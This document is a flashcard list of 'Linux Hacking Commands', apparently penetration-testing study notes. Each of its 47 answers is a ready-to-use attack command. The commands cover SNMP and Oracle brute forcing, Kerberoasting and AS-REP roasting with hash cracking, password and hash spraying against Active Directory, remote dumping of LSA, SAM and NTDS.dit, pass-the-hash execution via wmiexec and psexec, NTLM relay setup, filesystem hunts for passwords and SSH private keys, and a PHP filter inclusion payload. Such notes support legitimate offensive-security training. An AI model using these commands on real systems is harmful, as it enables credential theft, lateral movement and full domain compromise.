Linux Hacking Commands

Question 1

How to walk OIDs snmp?

Answer 1

snmpwalk -v2c -c [comunity string] [ip]

Question 2

How to brute force community strings snmp?

Answer 2

onesixtyone -c [wordlist] [ip]

Question 3

How to bruteforce OIDs snmp?

Answer 3

braa [community string]@[ip]:.1.3.6.*

Question 4

How to bruteforce oracle sids with nmap?

Answer 4

sudo nmap -p 1521 –open –script oracle-sid-brute

Question 5

How to enumerate oracledb service?

Answer 5

./odat.py all -s [ip]

Question 6

How to connect to oracledb service?

Answer 6

sqlplus [user]/[pass]@[ip]/[sid]

Question 7

How to enumerate IPMI with nmap?

Answer 7

sudo nmap -sU –script ipmi-version -p 623 [hostname]

Question 8

What is the IPMI dumphashes module metasploit?

Answer 8

use auxiliary/scanner/ipmi/ipmi_dumphashes

Question 9

How to use xfreerdp with pass the hash?

Answer 9

xfreerdp /v:[ip] /u:[user] /pth:[hash]

Question 10

How to kerberoast with impacket

Answer 10

GetUserSPNs.py [Domain/Username:password] -dc-ip [dc_ip] -request

Question 11

How to kerberoast on domain joined machine rubeus?

Answer 11

Rubeus.exe kerberoast

Question 12

How to check if smbexec is enabled with smbmap?

Answer 12

smbmap -H $ip -u [username] -p [password] -x “whoami”

Question 13

how to map an smb share with smbmap?

Answer 13

smbmap -H [ip] -u [username] -p [password] -r [share name]

Question 14

How to spray passwords for AD users?

Answer 14

nxc smb [host] -u [wordlist of users] -p [password wordlist] –continue-on-success

Question 15

How to spray hashes for AD users?

Answer 15

nxc smb [host] -u [wordlist of users] -H [hash list] –continue-on-success

Question 16

How to check if smb exec is enabled with nxc?

Answer 16

nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami

Question 17

How to check if smb exec is enabled with nxc and execute command with local admin?

Answer 17

nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami —local-auth

Question 18

How to enumerate smb shares with nxc?

Answer 18

crackmapexec smb [ip] -u [user] -p [pass] –shares

Question 19

How to enumerate domain users with rid brute?

Answer 19

nxc smb $ip -u [user] -p [pass] –rid-brute

Question 20

How to remotely dump lsa?

Answer 20

crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –lsa

Question 21

How to remotely dump SAM?

Answer 21

crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –sam

Question 22

How to remotely dump NTDS.dit

Answer 22

crackmapexec smb [ip] -u [user] -p [pass] –ntds

Question 23

How to remotely execute commands with wmi?

Answer 23

wmiexec.py [user]:[pass]@[ip] [command]

Question 24

How to remotely execute commands with wmi by passing a hash?

Answer 24

python3 wmiexec.py [user]:[pass]@[ip] -hashes [hash] [command]

Question 25

How to psexec remotely?

Answer 25

python3 psexec.py [user]:[pass]@[ip] [command]

Question 26

How to find AS-REP roastable users?

Answer 26

ldapdomaindump -u ‘[doamin][user]’ -p [pass] [ip]

Question 27

How to AS-REP roast with user list?

Answer 27

python3 GetNPUsers.py -dc-ip [ip] [domain]/ -usersfile users.txt

Question 28

How to crack AS-REP roast hashes?

Answer 28

hashcat -m 18200 [hashes] [wordlist] –force

Question 29

How to set up an NTLM relay smb server? 1

Answer 29

python3 ntlmrelayx.py -smb2support -o hashfile

Question 30

How to set up an NTLM relay smb server? 2

Answer 30

impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp

Question 31

How to enumerate AD Users using smb exec?

Answer 31

python3 GetADUsers.py [domain]/[user]:[pass] -dc-ip [ip]

Question 32

How to enumerate AD Users using smb exec by passing the hash?

Answer 32

python3 GetADUsers.py [domain]/[user]@[ip] -hashes [hash]

Question 33

How to dump SAM and LSA?

Answer 33

impacket-secretsdump -sam [sam] -system [system] -security [security]

Question 34

How to connect to smb share with pass the hash?

Answer 34

impacket-smbclient -hashes [hash] [domain]/[user]@[ip]

Question 35

How to convert windows ccache to linux kirbi? and vice versa

Answer 35

imacket-ticketConverter [ccache] [kirbi]

Question 36

How to easily enumerate an AD domain quickly?

Answer 36

enum4linux -a

Question 37

How to spider an smb share?

Answer 37

smbmap -H [target_ip] -u [username] -p [password] -R [share_name] –depth 5

Question 38

How to download a file from an smb share with smbmap?

Answer 38

smbmap -H [target_ip] -u [username] -p [password] -s [share] –download ‘[share][remote_file_path]’

Question 39

How to search for files with credentials?

Answer 39

for l in $(echo “.conf .config .cnf”);do echo -e “\nFile extension: “ $l; find / -name *$l 2>/dev/null | grep -v “lib|fonts|share|core” ;done

Question 40

How to search for files with passwords?

Answer 40

for i in $(find / -name *.cnf 2>/dev/null | grep -v “doc|lib”);do echo -e “\nFile: “ $i; grep “user|password|pass” $i 2>/dev/null | grep -v “#“;done

Question 41

How to search for databases?

Answer 41

for l in $(echo “.sql .db .db .db”);do echo -e “\nDB File extension: “ $l; find / -name *$l 2>/dev/null | grep -v “doc|lib|headers|share|man”;done

Question 42

How to look for txt files (notes) in home directory?

Answer 42

find /home/* -type f -name “.txt” -o ! -name “.*”

Question 43

How to look for scripts?

Answer 43

for l in $(echo “.py .pyc .pl .go .jar .c .sh”);do echo -e “\nFile extension: “ $l; find / -name *$l 2>/dev/null | grep -v “doc|lib|headers|share”;done

Question 44

How to check cronjobs?

Answer 44

cat /etc/crontab

Question 45

How to search for private SSH keys?

Answer 45

grep -rnw “PRIVATE KEY” /home/* 2>/dev/null | grep “:1”

Question 46

How to look for public SSH keys?

Answer 46

grep -rnw “ssh-rsa” /home/* 2>/dev/null | grep “:1”

Question 47

What is the payload for base64 PHP filter?

Answer 47

php://filter/read=convert.base64-encode/resource=[file]